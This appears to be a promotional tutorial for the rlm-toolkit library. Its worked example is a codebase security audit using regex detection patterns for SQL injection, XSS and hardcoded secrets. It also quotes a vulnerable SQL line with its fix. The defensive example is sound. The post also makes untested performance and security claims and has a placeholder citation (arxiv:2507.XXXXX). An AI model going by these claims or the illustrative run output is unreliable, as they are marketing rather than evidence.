from rlm_toolkit.providers import OllamaProvider

rlm = RLM(
    root=OllamaProvider("llama4-scout:109b"),  # 10M native context!
    sub=OllamaProvider("qwen3:7b"),            # fast inference
)
# Cost: $0 + electricity (~$0.50)
⚡ Speed-First:
# OpenAI is the fastest cloud option
rlm = RLM.from_openai(
    root_model="gpt-4o",
    sub_model="gpt-4o-mini",
)
# Speed: ~2 min for 10M tokens
import os
import time

from rlm_toolkit import RLM, RLMConfig, SecurityConfig
from rlm_toolkit.memory import HierarchicalMemory
from rlm_toolkit.observability import ConsoleTracer

# Configuration
config = RLMConfig(
    max_iterations=50,
    max_cost=5.0,
    use_infiniretri=True,
    infiniretri_threshold=100_000,
    security=SecurityConfig(sandbox=True),
)

# Memory and tracing
memory = HierarchicalMemory()
tracer = ConsoleTracer(verbose=True)

# Initialize RLM
rlm = RLM.from_ollama(
    model="llama4-scout:109b",
    config=config,
    memory=memory,
    tracer=tracer,
)

# Load repository
def load_repo(path: str) -> str:
    content = []
    for root, dirs, files in os.walk(path):
        # Skip hidden dirs and common excludes
        dirs[:] = [d for d in dirs if not d.startswith('.')
                   and d not in ['node_modules', '__pycache__', 'venv']]
        for f in files:
            if f.endswith(('.py', '.js', '.ts', '.go', '.rs')):
                filepath = os.path.join(root, f)
                try:
                    with open(filepath, encoding='utf-8') as fp:
                        content.append(f"\n\n# === FILE: {filepath} ===\n{fp.read()}")
                except OSError:
                    pass
    return "".join(content)

codebase = load_repo("./my_project")
print(f"Loaded {len(codebase):,} characters ({len(codebase)//4:,} tokens)")

# Run analysis
start = time.time()
result = rlm.run(
    context=codebase,
    query="""
    Run a full security audit of the codebase:
    1. SQL/NoSQL injections
    2. XSS vulnerabilities
    3. SSRF
    4. Hardcoded secrets
    5. Insecure deserialization
    6. Path traversal
    7. Authentication/authorization issues
    8. Race conditions

    For every vulnerability found, report:
    - File and line
    - Vulnerability type
    - Severity (Critical/High/Medium/Low)
    - Remediation recommendation
    """,
)
elapsed = time.time() - start

print("\n" + "="*60)
print("RESULT:")
print("="*60)
print(result.answer)
print(f"\nTime: {elapsed:.1f}s")
print(f"Iterations: {result.iterations}")
print(f"Sub-calls: {result.subcalls}")
print(f"Cost: ${result.cost:.2f}")
[RLM] Starting analysis...
[RLM] Context size: 2,847,293 chars (711,823 tokens)
[RLM] Using InfiniRetri (threshold exceeded)

[Iter 1] Root LLM generating code...
>>> files = context.split("# === FILE:")
>>> print(f"Repository contains {len(files)} files")
Output: Repository contains 127 files

[Iter 2] Root LLM generating code...
>>> security_patterns = {
...     "sql_injection": [r"execute\(.*%s", r"\.format\(.*\)", r"f\".*SELECT"],
...     "xss": [r"innerHTML\s*=", r"\.html\(.*\+"],
...     "secrets": [r"password\s*=\s*[\"']", r"api_key\s*=", r"secret\s*="],
... }
>>> import re
>>> findings = []
>>> for i, file in enumerate(files[1:], 1):
...     for vuln_type, patterns in security_patterns.items():
...         for pattern in patterns:
...             if re.search(pattern, file):
...                 findings.append((i, vuln_type, pattern))
>>> print(f"Found {len(findings)} potential issues")
Output: Found 23 potential issues

[Iter 3] Sub-LLM call for deep analysis...
>>> for file_idx, vuln_type, _ in findings[:5]:
...     file_content = files[file_idx][:6000]
...     analysis = llm_query(f"Analyze for {vuln_type}:\n{file_content}")
...     print(f"File {file_idx}: {analysis[:200]}")
[SUB-CALL 1/5] Analyzing file 3...
[SUB-CALL 2/5] Analyzing file 7...
[SUB-CALL 3/5] Analyzing file 12...
[SUB-CALL 4/5] Analyzing file 19...
[SUB-CALL 5/5] Analyzing file 24...

...

[Iter 8] Compiling final report...
>>> vulnerabilities = [
...     {"file": "api/users.py", "line": 42, "type": "SQL Injection",
...      "severity": "Critical",
...      "code": "cursor.execute(f'SELECT * FROM users WHERE id={user_id}')"},
...     {"file": "utils/auth.py", "line": 87, "type": "Hardcoded Secret",
...      "severity": "High", "code": "API_KEY = 'sk-abc123...'"},
...     ...
... ]
>>> FINAL_VAR(vulnerabilities)

============================================================
RESULT:
============================================================
[
  {
    "file": "api/users.py",
    "line": 42,
    "type": "SQL Injection",
    "severity": "Critical",
    "description": "User input directly interpolated into SQL query",
    "recommendation": "Use parameterized queries: cursor.execute('SELECT * FROM users WHERE id=%s', (user_id,))"
  },
  {
    "file": "utils/auth.py",
    "line": 87,
    "type": "Hardcoded Secret",
    "severity": "High",
    "description": "API key hardcoded in source code",
    "recommendation": "Move to environment variable: os.environ.get('API_KEY')"
  },
  ...
]

Time: 127.3s
Iterations: 8
Sub-calls: 12
Cost: $0.00 (local model)
| Problem | Cause | Solution |
|---|---|---|
| Run ends without an answer | LLM cannot find the answer | Increase `max_iterations` |
| Cost blows up | Too many sub-calls | Limit `max_depth` / `max_cost` |
| Timeout errors | Code takes too long to execute | Increase `max_execution_time` |
| Import blocked | Import blocked by the security layer | Add it to the whitelist if it is safe |
| Out-of-memory errors | OOM on a small model | Reduce the context segment size |
from rlm_toolkit import RLM
from rlm_toolkit.observability import ConsoleTracer, FileTracer

# Console tracing (development)
rlm = RLM.from_ollama("llama4-scout:17b", tracer=ConsoleTracer(verbose=True))

# File tracing (production)
rlm = RLM.from_ollama("llama4-scout:17b", tracer=FileTracer("./logs/rlm.log"))

# View execution history
result = rlm.run(context, query)
for step in result.trace:
    print(f"[{step.type}] {step.content[:100]}...")
# 1. Use a smaller model for sub-calls
rlm = RLM(
    root=OllamaProvider("llama4-scout:109b"),  # smart, for planning
    sub=OllamaProvider("qwen3:7b"),            # fast, for details
)

# 2. Enable caching
from rlm_toolkit.cache import DiskCache
rlm = RLM.from_ollama("llama4-scout:17b", cache=DiskCache("./cache"))

# 3. Parallel sub-calls (experimental)
config = RLMConfig(parallel_subcalls=True, max_parallel=4)
| Component | Description | Source |
|---|---|---|
| RLM Core | Recursive Language Models | arxiv:2512.24601 |
| InfiniRetri | Attention-based infinite retrieval | arxiv:2502.12962 |
| H-MEM | Hierarchical memory | arxiv:2507.XXXXX |
| R-Zero | Self-evolving LLMs | arxiv:2508.05004 |
| REBASE | Experience replay | arxiv:2512.29379 |
| CIRCLE | Security benchmark | arxiv:2507.19399 |
10M+ tokens without quality degradation
100% accuracy on Needle-in-a-Haystack
A 4-level memory hierarchy instead of a flat buffer
38 dangerous modules blocked: production-ready security
75+ providers, including fully local options
PyPI: pypi.org/project/rlm-toolkit
GitHub: github.com/DmitrL-dev/AISecurity/tree/main/rlm-toolkit
Documentation: docs
pip install rlm-toolkit

# With the full set of integrations
pip install rlm-toolkit[all]
Questions? Ask in the comments or open an issue on GitHub!
About the author: developer of the SENTINEL AI Security Platform, an open-source solution for protecting LLM applications.